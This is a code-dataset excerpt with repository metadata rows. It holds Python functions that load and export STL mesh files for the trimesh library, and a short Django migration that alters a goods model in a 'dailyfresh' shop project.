file_obj: open file- like object
Returns
----------
loaded: kwargs for a Trimesh constructor with keys:
vertices: (n,3) float, vertices
faces: (m,3) int, indexes of vertices
face_normals: (m,3) float, normal vector of each face
'''
header = file_obj.readline()
text = file_obj.read()
if hasattr(text, 'decode'):
text = text.decode('utf-8')
text = text.lower().split('endsolid')[0]
blob = np.array(text.split())
# there are 21 'words' in each face
face_len = 21
face_count = len(blob) / face_len
if (len(blob) % face_len) != 0:
raise HeaderError('Incorrect number of values in STL file!')
face_count = int(face_count)
# this offset is to be added to a fixed set of indices that is tiled
offset = face_len * np.arange(face_count).reshape((-1, 1))
normal_index = np.tile([2, 3, 4], (face_count, 1)) + offset
vertex_index = np.tile(
[8, 9, 10, 12, 13, 14, 16, 17, 18], (face_count, 1)) + offset
# faces are groups of three sequential vertices, as vertices are not
# references
faces = np.arange(face_count * 3).reshape((-1, 3))
face_normals = blob[normal_index].astype(np.float64)
vertices = blob[vertex_index.reshape((-1, 3))].astype(np.float64)
return {'vertices': vertices,
'faces': faces,
'face_normals': face_normals}
def export_stl(mesh):
'''
Convert a Trimesh object into a binary STL file.
Arguments
---------
mesh: Trimesh object
Returns
---------
export: bytes, representing mesh in binary STL form
'''
header = np.zeros(1, dtype=_stl_dtype_header)
header['face_count'] = len(mesh.faces)
packed = np.zeros(len(mesh.faces), dtype=_stl_dtype)
packed['normals'] = mesh.face_normals
packed['vertices'] = mesh.triangles
export = header.tostring()
export += packed.tostring()
return export
def export_stl_ascii(mesh):
'''
Convert a Trimesh object into an ASCII STL file.
Arguments
---------
mesh: Trimesh object
Returns
---------
export: str, mesh represented as an ASCII STL file
'''
# move all the data thats going into the STL file into one array
blob = np.zeros((len(mesh.faces), 4, 3))
blob[:, 0, :] = mesh.face_normals
blob[:, 1:, :] = mesh.triangles
# create a lengthy format string for the data section of the file
format_string = 'facet normal {} {} {}\nouter loop\n'
format_string += 'vertex {} {} {}\n' * 3
format_string += 'endloop\nendfacet\n'
format_string *= len(mesh.faces)
# concatenate the header, data, and footer
export = 'solid \n'
export += format_string.format(*blob.reshape(-1))
export += 'endsolid'
return export
_stl_loaders = {'stl': load_stl,
'stl_ascii': load_stl}
|
[
"mik3dh@gmail.com"
] |
mik3dh@gmail.com
|
480d9a66e2a6c4e56d92084f3b27f5626c89d12a
|
f9b5c37a098ed940d943415aadda130c13271754
|
/dailyfresh/f_goods/migrations/0003_auto_20180619_2120.py
|
47da203ab64800d2950a865ce0879526e9bf7ef2
|
[] |
no_license
|
duanHongPy/django
|
cd00fe819576741a7c1860ea420275129d759d67
|
3fee019b3d8d50218410366d62eac29700f9e69a
|
refs/heads/master
| 2020-03-19T23:28:01.420061
| 2018-06-21T02:53:19
| 2018-06-21T02:53:19
| 137,007,195
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 558
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-06-19 13:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('f_goods', '0002_auto_20180619_1910'),
]
operations = [
migrations.RemoveField(
model_name='goodinfo',
name='gsales',
),
migrations.AlterField(
model_name='goodinfo',
name='gclick',
field=models.IntegerField(default=0),
),
]
|
[
"xwp_fullstack@163.com"
] |
xwp_fullstack@163.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.